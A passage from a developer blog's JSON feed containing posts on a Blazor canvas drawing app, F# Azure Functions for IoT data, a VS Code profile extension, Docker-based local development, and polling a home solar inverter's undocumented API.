jsRuntime.InvokeAsync<object>("__blazorCanvasInterop.setContextPropertyValue", canvasRef, "strokeStyle", strokeStyle); } } This is a generic class that takes the captured reference and the JavaScript interop API and just gives us a nicer programmatic interface.\nWiring Up Our Context We can now wire up our context and prepare to draw lines on the canvas:\n@page "/" @inject IJSRuntime JsRuntime <canvas height="@windowSize.Height" width="@windowSize.Width" @onmousedown="@StartPaint" @onmousemove="@Paint" @onmouseup="@StopPaint" @onmouseout="@StopPaint" @ref="@canvas" /> @code { ElementRef canvas; WindowSize windowSize; Canvas2DContext ctx; protected override async Task OnInitAsync() { windowSize = await JsRuntime.InvokeAsync<WindowSize>("getWindowSize"); ctx = new Canvas2DContext(JsRuntime, canvas); } private void StartPaint(UIMouseEventArgs e) { } private async Task Paint(UIMouseEventArgs e) { } private void StopPaint(UIMouseEventArgs e) { } } By adding @ref="@canvas" to our <canvas> element we create the reference we need and then in the OnInitAsync function we create the Canvas2DContext that we’ll use.\nDrawing On The Canvas We’re finally ready to do some drawing on our canvas, which means we need to implement those event handlers:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 bool isPainting = false; long x; long y; private void StartPaint(UIMouseEventArgs e) { x = e.ClientX; y = e.ClientY; isPainting = true; } private async Task Paint(UIMouseEventArgs e) { if (isPainting) { var eX = e.ClientX; var eY = e.ClientY; await ctx.DrawLine(x, y, eX, eY); x = eX; y = eY; } } private void StopPaint(UIMouseEventArgs e) { isPainting = false; } Admittedly, these aren’t that different to the JavaScript implementation, all they have to do is grab the coordinates from the mouse event and then pass them through to the canvas context wrapper, which in turn calls the appropriate JavaScript function.\nConclusion 🎉 We’re done! You can see it running here and the code is on GitHub (the GitHub repo contains the info to use VS Code remote containers so you don’t have to install anything).\nThis is a pretty quick look at Blazor, but more importantly, how we can use Blazor in a scenario that might require us to do a bit more interop with JavaScript that many scenarios require.\nI hope you’ve enjoyed it and are ready to tackle your own Blazor experiments as well!\nBonus, The Colour Picker There’s one thing that we didn’t do in the above example, implement the colour picker!\nI want to do this as a generic component so we could do this:\n<ColourPicker OnClick="@SetStrokeColour" Colours="@colours" /> In a new file, called ColourPicker.razor (the file name is important as this is the name of the component) we’ll create our component:\n<div class="colours"> @foreach (var colour in Colours) { <button class="colour" @onclick="@OnClick(colour)" @key="@colour"></button> } </div> @code { [Parameter] public Func<string, Action<UIMouseEventArgs>> OnClick { get; set; } [Parameter] public IEnumerable<string> Colours { get; set; } } Our component is going to have 2 parameters that can be set from the parent, the collection of colours and the function to call when you click on the button. For the event handler I’ve made is so that you pass in a function that returns an action, so it’s a single function that is “bound” to the name of the colour when the <button> element is created.\nThis means we have a usage like this:\n@page "/" @inject IJSRuntime JsRuntime <ColourPicker OnClick="@SetStrokeColour" Colours="@colours" /> // snip @code { IEnumerable<string> colours = new[] { "#F4908E", "#F2F097", "#88B0DC", "#F7B5D1", "#53C4AF", "#FDE38C" }; // snip private Action<UIMouseEventArgs> SetStrokeColour(string colour) { return async _ => { await ctx.SetStrokeStyleAsync(colour); }; } } Now if you click the colour picker across the top you get a different colour pen.\nHappy doodling!\n", "id": "2019-07-08-creating-devto-offline-page-with-blazor" }, { "title": "Home Grown IoT - Processing Data", "url": "https://www.aaron-powell.com/posts/2019-07-01-home-grown-iot-processing-data/", "date": "Mon, 01 Jul 2019 11:20:18 +1000", "tags": [ "fsharp", "iot", "azure-functions", "serverless" ], "description": "How I go about processing data streams from IoT devices", "content": "Last Time we looked at how to get data from an IoT device and start pushing it up to Azure, now it’s time for the next step, processing the data as it comes in.\nI mentioned in the solution design that the processing of the data would happen with Azure Functions so let’s have a look at how that works.\nProcessing Data with Functions Azure Functions has built in support for processing data out of IoT Hub which makes it really easy to integrate. The only drawback of this is that it monitors the built-in event hub that’s provided by IoT Hub and if you have multiple data structures being submitted (like I do) your Function will become complex. Instead I’m going to use the Event Hub binding.\nDesigning Functions When designing functions, or serverless in general, you want to keep them as small as possible; our goal isn’t to create a serverless monolith! This means that part of the design requires you to think about what the role your functions will be playing. For me, they will be responsible for converting the JSON payloads that are sent from the IoT device into a structure that is stored in Table Storage. If we think about the APIs I described in the data downloader post there is one endpoint, livedata, that provides me with the bulk of the data needed for capture.\nAfter a bit of inspection of the real API I noticed that there were 3 buckets that this data could be represented in:\nPanel data Point-in-time summary data Miscellaneous data I made the decision to store each of these as separate tables in Table Storage (to understand more, check out the post on data design). Since they all come from the same originating structure I could do it all in a single function, but instead I split it into 3 functions, keeping each as lightweight as possible.\nWriting Our Function The Functions are implemented in F# (here’s how to set that up) and I’m using the FSharp.Azure.Storage NuGet package to make working with the Table Storage SDK more F# friendly.\nNote: If you’re going to use that NuGet package in F# Azure Functions you’ll need to be really careful on the versions that you’re depending on. Since Functions internally uses Table Storage there’s a potential to bring in conflicting versions that results in errors. I solved this with very explicit pinning in my paket.dependencies file.\nWe’ll start by defining the Record Type that will be stored in Table Storage:\n1 2 3 4 5 6 7 8 9 10 type PanelInfo = { [<PartitionKey>] DateStamp: string [<RowKey>] Id: string Panel: string MessageId: string Current: float // Iin# Volts: float // Vin# Watts: float // Pin# MessageTimestamp: DateTime // SysTime CorrelationId: string } On the Record Type I’ve added attributes to represent which members will be the Partition and Row keys in Table Storage, which makes it nicer for me to work against the object model if I require. This type is used to represent the data for a single group of panels in my solar setup and gives me a view of the inbound values across Volts, Watts and Current.\nTo define the Function itself we create a member in the module:\n1 2 3 4 5 6 [<FunctionName("PanelTrigger")>] let trigger ([<EventHubTrigger("live-data", ConsumerGroup = "Panel", Connection = "IoTHubConnectionString")>] eventData: EventData) ([<Table("PanelData", Connection = "DataStorageConnectionString")>] panelDataTable: CloudTable) (logger: ILogger) = ignore() // todo We attribute the member (which I’ve called trigger) with FunctionName so the Functions host knows to find it and knows what name to give it. Unfortunately, you’ll need to explicitly state the type, F# won’t be able to infur the type based on usage of the complex types in the binding (at least, not in my experience).\nThis Function has 3 inputs to it, the first is the Event Hub binding, which binds to an Event Hub named live-data using the Consumer Group Panel (see the Solution Design section Handling a Message Multiple Times for why I use Consumer Groups). We’ll also use the EventData type for the input, not a string, so we can access the metadata of the message, not just the body (which is what comes in when the type is string). Next up is the output binding to Table Storage, bound as a CloudTable, which provides me with interop with FSharp.Storage.Data. Lastly is the ILogger so I can log out messages from the Function.\nUnpacking the Message It’s time to start working with the message, and for that I need to extract the body (and strongly type it with a Type Provider) and get some metadata:\n1 2 3 4 5 6 7 8 9 10 11 [<FunctionName("PanelTrigger")>] let trigger ([<EventHubTrigger("live-data", ConsumerGroup = "Panel", Connection = "IoTHubConnectionString")>] eventData: EventData) ([<Table("PanelData", Connection = "DataStorageConnectionString")>] panelDataTable: CloudTable) (logger: ILogger) = async { let message = Encoding.UTF8.GetString eventData.Body.Array let correlationId = eventData.Properties.["correlationId"].ToString() let messageId = eventData.Properties.["messageId"].ToString() let parsedData = LiveDataDevice.Parse message The EventData object gives us access to the body of the message as an ArraySegment but we want the whole array, which is exposed by the Array property. This is a UTF8 encoded byte array so we have to decode that to the string of JSON (or whatever your transport structure was). Then, because we have access to the whole message, not just the body, we can access the additional properties that are put into the message by the downloader, the CorrelationId and MessageId.\nBecause the data points comes up as an array of key/value pairs I created a function to find a specific point’s value:\n1 2 3 let findPoint (points: LiveDataDevice.Point[]) name = let point = points |> Array.find(fun p -> p.Name = name) float point.Value And then use partial application to bind the parsed data to it:\n1 2 3 4 5 6 7 8 9 10 11 12 [<FunctionName("PanelTrigger")>] let trigger ([<EventHubTrigger("live-data", ConsumerGroup = "Panel", Connection = "IoTHubConnectionString")>] eventData: EventData) ([<Table("PanelData", Connection = "DataStorageConnectionString")>] panelDataTable: CloudTable) (logger: ILogger) = async { let message = Encoding.UTF8.GetString eventData.Body.Array let correlationId = eventData.Properties.["correlationId"].ToString() let messageId = eventData.Properties.["messageId"].ToString() let parsedData = LiveDataDevice.Parse message let findPoint' = findPoint parsedData.Points Writing to Storage Because I need to write 2 panel groups to storage I created a function in the Function to do that:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 [<FunctionName("PanelTrigger")>] let trigger ([<EventHubTrigger("live-data", ConsumerGroup = "Panel", Connection = "IoTHubConnectionString")>] eventData: EventData) ([<Table("PanelData", Connection = "DataStorageConnectionString")>] panelDataTable: CloudTable) (logger: ILogger) = async { let message = Encoding.UTF8.GetString eventData.Body.Array let correlationId = eventData.Properties.["correlationId"].ToString() let messageId = eventData.Properties.["messageId"].ToString() let parsedData = LiveDataDevice.Parse message let findPoint' = findPoint parsedData.Points let deviceId = parsedData.DeviceId.ToString() let timestamp = epoch.AddSeconds(findPoint' "SysTime") let storePanel p = let panel = { DateStamp = timestamp.ToString("yyyy-MM-dd") Panel = p Id = Guid.NewGuid().ToString() MessageId = messageId Current = findPoint' (sprintf "Iin%s" p) Volts = findPoint' (sprintf "Vin%s" p) Watts = findPoint' (sprintf "Pin%s" p) MessageTimestamp = timestamp CorrelationId = correlationId } panel |> Insert |> inTableToClientAsync panelDataTable This created the record type using the panel number passed in (let! _ = storePanel "1" is how it’s called) before handing it over to the Insert function from my external library. But FSharp.Azure.Storage library is designed to work with the client from the SDK, and convert that into a CloudTable, it’s not 100% optimised for using in Azure Functions, this is an easy fix though, here’s a function to handle that:\n1 let inTableToClientAsync (table: CloudTable) o = inTableAsync table.ServiceClient table.Name o Finally, because we’re using F#’s async workflows and the Azure Function host only handles Task<T> (C#’s async) we need to convert it back with Async.StartAsTask:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 [<FunctionName("PanelTrigger")>] let trigger ([<EventHubTrigger("live-data", ConsumerGroup = "Panel", Connection = "IoTHubConnectionString")>] eventData: EventData) ([<Table("PanelData", Connection = "DataStorageConnectionString")>] panelDataTable: CloudTable) (logger: ILogger) = async { let message = Encoding.UTF8.GetString eventData.Body.Array let correlationId = eventData.Properties.["correlationId"].ToString() let messageId = eventData.Properties.["messageId"].ToString() let parsedData = LiveDataDevice.Parse message let findPoint' = findPoint parsedData.Points let deviceId = parsedData.DeviceId.ToString() let timestamp = epoch.AddSeconds(findPoint' "SysTime") let storePanel p = let panel = { DateStamp = timestamp.ToString("yyyy-MM-dd") Panel = p Id = Guid.NewGuid().ToString() MessageId = messageId Current = findPoint' (sprintf "Iin%s" p) Volts = findPoint' (sprintf "Vin%s" p) Watts = findPoint' (sprintf "Pin%s" p) MessageTimestamp = timestamp CorrelationId = correlationId } panel |> Insert |> inTableToClientAsync panelDataTable let! _ = storePanel "1" let! _ = storePanel "2" logger.LogInformation(sprintf "%s: Stored panel %s for device %s" correlationId messageId deviceId) } |> Async.StartAsTask And with that, for each message we received 2 entries are written to Table Storage.\nConclusion I won’t go over each of the functions in the project as they all follow this same pattern, instead, you can find them on GitHub.\nWhile it might feel a little like a micromanagement of the codebase by having a whole bunch of functions with less than 50 lines in them, it makes them a lot simpler to maintain and editable as you iterate the development. It also makes it scale very nicely, which I’ve found a few times when I’ve accidentally disabled the functions for 24 hours and had a huge backlog in Event Hub to process, it makes quick job of it!\nI hope this gives you a bit of an insight into how you can create your own Azure Functions stack for processing data, whether it’s from an IoT device, or some other input stream.\n", "id": "2019-07-01-home-grown-iot-processing-data" }, { "title": "A VS Code Extension for Managing Profiles", "url": "https://www.aaron-powell.com/posts/2019-06-28-vscode-extension-for-managing-profiles/", "date": "Fri, 28 Jun 2019 11:29:54 +1000", "tags": [ "vscode" ], "description": "I've created a little VS Code extension for swapping between different profile setups", "content": "Part of my job as a Cloud Developer Advocate is to present, whether that is at a lunch and learn session, a user group, a conference or a screen cast. One thing that’s become second nature to me with presenting is tweaking my editor font size, theme, etc. so that it is optimal for the audience. But this becomes a bit tedious, because I then have to go back and undo all my changes again and the constant change back and forth is annoying.\nSo with that I decided to create an extension for VS Code called Profile Switcher.\nHow It Works When you save a profile with the extension it will create a copy of the settings.json file that exists for your user (on Windows this is %APPDATA%\\Roaming\\Code\\User\\settings.json) and then store it in the settings.json file in settings property that the extension knows about.\nSide note: It doesn’t clone the extension settings, just everything else, wouldn’t want you to have recursive settings saved! 🤣\nThen when you load the a profile it will merge your current settings.json with the previously saved one, updating the properties that are different (and not touching the ones that didn’t change). Because it updates your user settings.json all open VS Code instances will have the changes applied, handy if you’re running demos across multiple VS Code instances!\nA nifty side-effect of how this works is that if you’re using the Settings Sync extension your profiles will be synchronised with that, so when you jump between machines you can bring your profiles along with you!\nThis also means that it’s not just for presenting, it’s for any scenario where you might want to quickly jump between settings changes in VS Code.\nConclusion I hope you find this extension useful and I’ve love to get some feedback on what it could also be used for. I’ve made the code available on GitHub so you can create an issue for me or propose an update. 😁\n", "id": "2019-06-28-vscode-extension-for-managing-profiles" }, { "title": "Home Grown IoT - Local Dev", "url": "https://www.aaron-powell.com/posts/2019-06-19-home-grown-iot-local-dev/", "date": "Wed, 19 Jun 2019 09:24:38 +1000", "tags": [ "fsharp", "iot" ], "description": "A look at how you can do local development with IoT solutions", "content": "Now that we’re starting to build our IoT application it’s time to start talking about the local development experience for the application. At the end of the day I use IoT Edge to do the deployment onto the device and manage the communication with IoT Hub and there is a very comprehensive development guide for Visual Studio Code and Visual Studio 2019. The workflow of this is to create a new IoT Edge project, setup IoT Edge on your machine and do deployments to it that way. This is the way I’d recommend going about it yourself as it gives you the best replication of production and local development.\nBut as you might have guessed I didn’t follow that guide myself, mainly because I didn’t integrate with IoT Edge (or IoT Hub for that matter) until after I’d started building my solution, instead I retrofitted them back into a standard .NET Core project, and this is what I’ll talk about today.\nDefining Our Moving Parts Another reason that I didn’t go back and completely integrate IoT Edge into my project for local development is because I have a single git repo that contains three main pieces, the Downloader that runs on the Raspberry Pi, some Azure Functions that run in Azure and a webserver that I use as a mock of my inverter API that is only used to support local development.\nThis has meant that my git repo looks like this:\n/src /Sunshine.Downloader /Sunshine.Functions /Sunshine.MockAPI And everything kind of assumes that you’re doing 1 project per repo, so the only thing that is there is IoT “stuff”, which isn’t my case.\nWith all of this in mind it was easier to have a local development setup that works for my scenario than shoehorn in the recommended guidance.\nDocker All The Things I’m a huge fan of using Docker for local development and given that IoT Edge deployments use Docker images to run on the device it was a convenient decision that I made early on to do my development this way! But here’s the kicker, I have 3 different containers that I’ll need to run (yes I could put it all into a single container, no you shouldn’t do that) so how do we effectively do that in Visual Studio Code? A launch.json file tends to be around debugging, so we’ll have to stick to just using tasks.\nBuilding Images This is the first thing that we’ll need to do, build the three different images that are needed for local development. But here’s the interesting problem, it’s a single .NET Core solution that shares some code files across the projects (mostly type definitions so I can do type-certainty across the wire) meaning I really only want to do a compile once. That is a bit of a pain with Docker, I’d normally use multi-stage builds and do the compile step in there, spitting out the image with the compiled files, but that won’t work easily when I spit out three images!\nTo combat this I do the compilation (and publish) step on my host machine first and then pull the build artifacts into the images. This comes with a slight overhead as I have to run a few tasks manually in VS Code.\nOrchestrating With Tasks I have three main tasks that I use in VS Code for running locally. The first does the publish (publish:debug) of the .NET solution so I get the artifacts to be used in the Docker images (docker build) and finally is a task that creates the three images and finally a task that starts all three containers (docker run). You’ll find the tasks.json in the GitHub repository.\nAll of these tasks are Compound Tasks, meaning they are tasks that run other tasks. One thing to remember about compound tasks is that the tasks you list in the dependsOn property are executed in parallel, so if you want a task that runs an image it has to depend on a task that builds the image and it depends on the .NET publish. This was a slight annoyance for me since I have 3 tasks (image creation) that depend on 1 task completion (.NET publish), so I have to run them manually.\nDebugging I’ve previously written about debugging .NET Core in Docker from VS Code and a challenge I had debugging the Azure Functions base image and this is the process I use for local development, start the containers with tasks, use launch.json to attach to containers as required. The biggest pain is that you can’t connect the debugger to multiple containers at one time, but this is just a limitation in the debugger in VS Code (and not a major pain).\nConclusion The approach I’m taking for local development isn’t really tied to this project being an IoT project, instead, it’s more running a few small .NET applications, all using Docker containers. Using Docker means that I can easily control the environment I’m using for development but also replicates how the IoT part of the project will run in production.\nIf I was building a project to run on more devices than just my own (and for use in a team environment) I’d use the approach described on the Microsoft docs for Visual Studio Code and Visual Studio 2019 as it’s a lot more robust. But this works just fine for my needs. 😉\n", "id": "2019-06-19-home-grown-iot-local-dev" }, { "title": "Home Grown IoT - Data Downloader", "url": "https://www.aaron-powell.com/posts/2019-06-12-home-grown-iot-data-downloader/", "date": "Wed, 12 Jun 2019 09:47:13 +1000", "tags": [ "fsharp", "iot" ], "description": "Let's start diving into the codebase, starting with capturing data", "content": "We talked last time about how to structure data for IoT projects and some of the decisions that led me to the structure that I have ultimately taken with the project, so this makes it seem like a good time to start looking at the code, in particular, the code I use to capture the data from the inverter itself.\nI’ll be focusing on the code for the Downloader, which lives in this part of the GitHub repo and also touch on a bit on the general development approaches I went with for the project.\nCodebase Basics Let’s start with some of the basics of how the codebase works. As I mentioned in the prologue I chose to do this as an F# .NET Core application so that I could easily deploy it to both Linux and Windows. I’m also using Docker for the development and deployment (I’ll cover local development in a future post though) to make it easier for me to control the dependencies and environment.\nI also opted to use Paket, which is an alternative package manager to NuGet that is very common in the F# community but also introduces the concept of a lockfile to better handle transitive dependencies or conflicting dependency versions. I will admit that I’m not sold on Paket, I did have a number of times where I was having to actively fight it and it also isn’t a .NET Core tool, meaning you need mono if you want to use Linux/WSL or rely on the in-development-and-unsupported-version (which is actually what I do). But in the end I got it all working, so I am careful not to touch it, lest I break things! 😝\nThe codebase is broken up into 3 projects, Downloader (which we’ll cover today), Functions and Mock API (for local development). These all live in the src folder alongside some shared files (in Shared). The root of the git repo contains the usual git files, my azure-pipelines.yml for the build pipeline (I’ll talk Pipelines in the future), the Paket files and a .sln. Admittedly, I do most of the development in VS Code, but sometimes I fire up full Visual Studio, especially when trying to visualise the dependency tree.\nThe Downloader It’s time to start looking at the Downloader and in doing so learn a bit about how the ABB inverter exposes its API. But there’s one thing I want to make clear from the outset:\nI am working against an undocumented API on the inverter, and using it in a way it was not intended to be used. Accessing your inverter in this manner shouldn't break anything but it just might. I take no responsibility for any damage you might somehow do! Do this at your own risk!\nWith the disclaimer done let’s look at how we’ll get the data. The first job for me was to work out how to actually get the data, after all, this isn’t a documented API, so I needed to work out just what endpoints existed and what I needed to access.\nThe approach I took for this was to sit with the network tools in my browser open while I was on the dashboard for the inverter and just watched the XHR network events. Given I’d already determined it to be an AngularJS application it was really just a matter of watching the network traffic to find the things that were most useful. Through doing that I found 4 interesting API endpoints (there were others but either I can’t work out what they are for, or they are just keep-alive tests):\n/v1/specs This API describes the devices that are available and returns a JSON payload (example) that gives me the information about the device (the inverter) and the logger (the thing that sends data to ABB’s cloud platform) Ultimately, this API is a metadata endpoint which I don’t need to call, but I do because it means I don’t have to hard-code anything about my device in the solution The dashboard seems to invoke this when the AngularJS application first starts up, and never again (I guess the values are in the JavaScript memory) /v1/livedata/list This is one of two API’s under livedata and it is another metadata endpoint, this time it gives me the information about what sensors are being monitored by the inverter that I can get data from. It also provides information about them like their unit of measure, description (which, generally speaking, isn’t actually descriptive!) and decimal precision. Again I have an example on GitHub The dashboard seems to invoke this approximately every 5 minutes. I don’t know why it would refresh this, hopefully the sensors don’t change that often! /v1/livedata This is the juicy bit, here’s where the data is useful, this returns the values for the sensors described by livedata/list (example) The dashboard calls this a lot, approximately every 30 seconds, which stands to reason as it is the primary data feed /v1/feeds This API confuses me as it is always called with a bunch of query string values that returns the Pgrid in 5 minute blocks. By looking at the data it appears that Pgrid is to do with the power (watts) to the grid from the inverter (and that stands to reason from the name) but I wasn’t able to work out anything else I could adjust on the query string if I wanted to get other metrics. I think I do get this information in livedata too, but it can’t hurt to have it captured twice, and after all, they made a dedicated API for this for a reason. Anyway, the structure of this response is quite weird (example) but it’s not too hard to consume The dashboard seems to invoke this approximately every 5 minutes, and given the response is 5 minute time slices, there’s no need to call it more frequently than that Armed with our 4 APIs to call we can start building our application.\nAPI Helpers The API I’m accessing is secured using Basic Authentication, which added an Authorization token to the request that contains a base 64 encoded string of username:password, not super secure, but it’ll do. We’ll make a little helper function to generate that for us:\n1 2 3 4 let getAuthToken username password = sprintf "%s:%s" username password |> ASCIIEncoding.ASCII.GetBytes |> Convert.ToBase64String To access the API I’m using FSharp.Data’s HTTP Utilities and wrapped that up in a function called getData:\n1 2 3 4 5 6 7 8 let getData authToken baseUri (path : string) = let url = Uri(baseUri, path) printfn "Requesting: %s" (url.ToString()) Http.AsyncRequestString ( url.ToString(), httpMethod = "GET", headers = [ Accept HttpContentTypes.Json Authorization (sprintf "Basic %s" authToken) ] ) This function takes the token (output from getAuthToken) and the API base for the inverter, to which we add the specific API path. This little function then wraps up the setting on the appropriate headers and issuing the request to get the JSON response back for us to use.\nStarting the Application When the Downloader starts up it prints out the logo (helps me spot in the logs when it restarts 🤣) and then establishes a connection to Azure IoT Hub.\nEstablishing IoT Client Connections With the solution I either run this locally or on my Raspberry Pi I adjust the way I establish the connection, and importantly, the type of connection. For local development I connect to IoT Hub as a managed device but when it’s on the Raspberry Pi it’s deployed using IoT Edge as a module. I’ll cover both of these topics in greater detail when I do local development and deployments, but know that there’s not a whole lot different in the way you connect, other than one uses the DeviceClient and the other uses the ModuleClient.\nBecause of this, I have a little wrapper around the clients (they don’t share a common base type other than Object) using an F# Record Type and exploiting functions-as-references:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 module IoTWrapper open Microsoft.Azure.Devices.Client open Microsoft.Azure.Devices.Shared type IoTConnectionWrapper = { SendEventAsync : Message -> Async<unit> GetTwinAsync : unit -> Async<Twin> } let getIoTHubClient iotConnStr = async { return! match iotConnStr with | null | "" -> async { let amqpSetting = AmqpTransportSettings(TransportType.Amqp_Tcp_Only) :> ITransportSettings; let! client = [| amqpSetting |] |> ModuleClient.CreateFromEnvironmentAsync |> Async.AwaitTask do! client.OpenAsync() |> Async.AwaitTask return { SendEventAsync = fun msg -> client.SendEventAsync msg |> Async.AwaitTask GetTwinAsync = fun () -> client.GetTwinAsync() |> Async.AwaitTask } } | _ -> async { let client = DeviceClient.CreateFromConnectionString iotConnStr return { SendEventAsync = fun msg -> client.SendEventAsync msg |> Async.AwaitTask GetTwinAsync = fun () -> client.GetTwinAsync() |> Async.AwaitTask } } } getIoTHubClient takes a connection string (which is passed for local development) and uses pattern matching to check if I did provide a connection string (implied local development) or not. Side note: I love F# pattern matching!\nUsing the pattern of | null | "" -> allows me to test on a few different outcomes and have them all result in the same block, whereas | _ -> means “anything that wasn’t previously matched. I’m also making extensive use of F# Async Workflows to unwind the C# Task API and make it fit better into F#’s approach to async.\nUsing IoT Twins When it comes to working with an IoT solution the code that is running on the device is likely to be quite generic, after all, it’s deployed to potentially hundreds of devices, so you don’t want to be embedding secrets into the codebase because then you have the same secret everywhere. While I might only have 1 device I’m working with I still didn’t want to embed the username, password and IP address of my inverter in the code (I don’t want that on GitHub!) so I need some way to get them onto the device in a secure manner.\nInitially, I went down the path of setting environment variables on the Docker container when it started to pass them in, but that is quite a bit trickier when it comes to deploying to the IoT devices, instead I decided to use a Device Twin (side note: if you’re using a ModuleClient you’d use a Module Twin, which is the same as a Device Twin but scoped to just that module). A Device Twin is a JSON configuration file for the device that is stored in Azure and can either be updated by the device or through the portal/az cli (and by extension, any third party tooling).\nWithin my Twin I added a new Desired Property with the authentication information for the API:\n1 2 3 4 5 6 7 8 9 10 11 12 13 // snip "properties": { "desired": { "inverter": { "username": "...", "password": "...", "url": "http://..." }, "$metadata": { // and so on } } } Then it’s a matter of getting the Twin info:\n1 2 3 4 5 6 async { let! iotClient = getIoTHubClient iotConnStr let! twin = iotClient.GetTwinAsync() let iotProperties = parseDesiredProperties twin.Properties.Desired parseDesiredProperties is a little function to help unpack the TwinCollection that is returned into a type that is useful for me:\n1 2 3 4 5 open FSharp.Data type DesiredProperties = JsonProvider<""" {"inverter":{"username":"user","password":"pass","url":"http://localhost/"},"$version":4} """> let parseDesiredProperties (data : TwinCollection) = data.ToJson() |> DesiredProperties.Parse You might notice I’m using the JSON Type Provider from FSharp.Data here, I use that a lot to convert the JSON representations back to strongly typed objects.\nNow I can do some partial application to setup the getData function for use multiple times within the application:\n1 2 let token = getAuthToken iotProperties.Inverter.Username iotProperties.Inverter.Password let getData' = getData token (Uri iotProperties.Inverter.Url) What this means is that whenever I need to make an API call I can use getData' which already has the access token and inverter base URI arguments applied.\nPolling APIs The other moderately complex piece is polling each of these APIs on different schedules. I could go down the route of using something like Hangfire but then I would also need to include a SQL Server (or similar) to have the polling managed effectively, and that’d add cost + complexity. If I was doing this for multiple devices I’d recommend it, but for a single device that’s primarily for personal use, downtime and lost data isn’t the end of the world.\nInstead, I’m using Async.Start from the F# Async Workflows to spawn a new thread and then running a recursive function, like this:\n1 2 3 4 5 6 7 8 9 let rec dataPoller() = async { match! getLiveData getData' deviceId with | Some liveData -> do! sendIoTMessage iotClient "liveData" correlationId liveData | None -> ignore() do! int(TimeSpan.FromSeconds(20.).TotalMilliseconds) |> Async.Sleep dataPoller() |> Async.Start } dataPoller() |> Async.Start Here I call the livedata API once every 20 seconds (that way with latency, etc. I get about 1 every 30 seconds), use pattern matching against the API wrapper I have, which returns an Option for error handling, and assuming it was successful sends the data to IoT Hub. And why did I use a recursive function? Well, it’s only a recursive function in the fact that the function calls itself, it doesn’t actually pass any data into the new invocation, and we could do this as a loop of some variety, but a recursive function like this is more of a common F# pattern. You might be wondering about stack overflow exceptions, thankfully F# has some pretty good optimisations around recursive functions so I shouldn’t hit it, I’ve had it running for a number of days now resulting in hundreds of thousands of messages, and it hasn’t crashed! … yet\nLinking API Calls Together Each API call is happening in a separate background job, handled by a separate recursive function, all running on different threads, which means that it is difficult to know which message is related to which other messages. I wanted to be able to relate all messages back to a time slice centred around the livedata/list API call, since it’s polled the most infrequently. I do this by using a CorrelationId that is stored in a mutable F# variable. Each time the livedata/list API is called the variable is updated and since the variable is defined before all the recursive functions, each one has access to it via closure scopes.\nI then created a helper function to wrap the call to the IoT client (either ModuleClient or DeviceClient, via the wrapper type I made):\n1 2 3 4 5 6 7 8 let sendIoTMessage<'T> client route correlationId (obj : 'T) = let json = obj |> toS let msg = new Message(Encoding.ASCII.GetBytes json) msg.Properties.Add("__messageType", route) msg.Properties.Add("correlationId", correlationId.ToString()) msg.Properties.Add("messageId", Guid.NewGuid().ToString()) printfn "Submitting %s with correlationId %A" route correlationId client.SendEventAsync msg Here we create a new Message to sent to IoT Hub with a JSON serialised message, then some metadata is added to it, __messageType which is used by the IoT Hub routing to route the message to the right Event Hub, the correlationId to link messages and a unique messageId so that if a message is processed multiple times we can link those processes together.\nKeeping the Application Running The last thing I need the application to do is not exit, since it doesn’t know to wait until the background jobs stop. Initially, I was going to rely on Console.ReadLine() and leave it waiting until a newline character was sent, but this doesn’t work if it’s running in a Docker container without stdin attached (ie: a non-interactive container), which is how it’s deployed to the Raspberry Pi.\nConveniently there’s a way that we can test for that, Console.IsInputRedirected, and we can combine it like so:\n1 2 3 4 5 6 printfn "Background jobs running, now we're waiting... " if Console.IsInputRedirected then while true do do! Async.Sleep 300000 else Console.ReadLine() |> ignore Now depending on how our container starts we either wait for a newline character to terminate or the application will run indefinitely.\nConclusion The full codebase for the Downloader is available on GitHub (and I’ve pinned this post to the commit that is HEAD at the time of writing).\nWe’ve seen in this post how we can leverage some F# language features like partial application and pattern matching to tackle some of our goals and seen how we can have credentials/secrets provided to a device without the need to embed them in the application.\nI hope this gives you some insights into the approach I’ve taken to scrape data from my inverter. I’d love feedback on the approach, is there anything that could be done simpler? Doesn’t make sense? Seems overengineered?\n", "id": "2019-06-12-home-grown-iot-data-downloader" }, { "title": "Home Grown IoT - Data", "url": "https://www.aaron-powell.com/posts/2019-06-07-home-grown-iot-data/", "date": "Fri, 07 Jun 2019 10:13:24 +1000", "tags": [ "fsharp", "iot" ], "description": "A look at managing data in an IoT project", "content": "One part of my IoT solution design that I wanted to dive into a bit more in the data side of things because after all, the reason I’m making this project is to capture data.\nThe first question you might want to ask yourself when making an IoT project is where are you going to store the data, this was where I started, but now that I’ve completed the first release I’ve realised that that was the wrong question to have started with, instead I should have asked what was I going to do with the data?\nUsing Your Data Before you choose a storage type and data structure it’s really important to start thinking about just what you will use your data for. Azure has lot of things to choose from such as Time Series Insights, Machine Learning services, Stream Analytics, Power BI or even the humble Excel spreadsheet! You can also build your own dashboards, maybe even some animated charts with React 😉.\nAll of this will influence the decisions that you make around storage and structure.\nFor my solution I have two ways I want to use the data at the moment, first is to generate Power BI reports that allow me to look at trends over time (generation, consumption, etc.), second is to create some custom real-time charts.\nStructuring Your Data Now we’ve got an idea of what we want to do without data it’s time to think about how we will structure it, as that will have an influence on the type of storage that we use.\nFrom my inverter I’m getting three data sets:\nThe labels for the sensors being monitored The values from each monitored sensor The power generated in 5-minute increments (I think… I’m not 100% sure if that’s what it, but that’s what I think it is) The data in 1 & 3 are interesting but the really valuable information is the data from the 2nd API. In here it’s broken down with a few valuable groups:\nThe watts, amps and volts per panel group A summary of the watts, amps and volts that went into the inverter A summary of the watts, amps, volts and hertz that went to the grid (I think… It’s called “out” in the API so I’m guessing that’s out of the inverter to the grid) Total generation summary in day, week, month, year and all time There’s a heap of other points that I get back that I don’t understand too (this is an undocumented API after all 🤣).\nWith this in mind, I started to think about the kinds of “questions” I would formulate for the data, such as “what is the power generated by each panel set for the last 30 days?”, “what’s the total in and out?” or “how much power do we use as a household?”. This helped me think about how best to structure the data.\nI decided that I wanted to store the raw message untouched since I don’t use all fields yet (but may in the future), and I want to do this for each API that I call.\nNext, I want to break down the main one into a few groups, Panel Feed and Summary. This is where I use multiple functions and consumer groups that I described in the solution design.\nFinally, we want to structure our data for the kinds of queries we want to do against it. I made the decision that I would optimise for read in a non-relational manner, meaning I’ll duplicate data across the 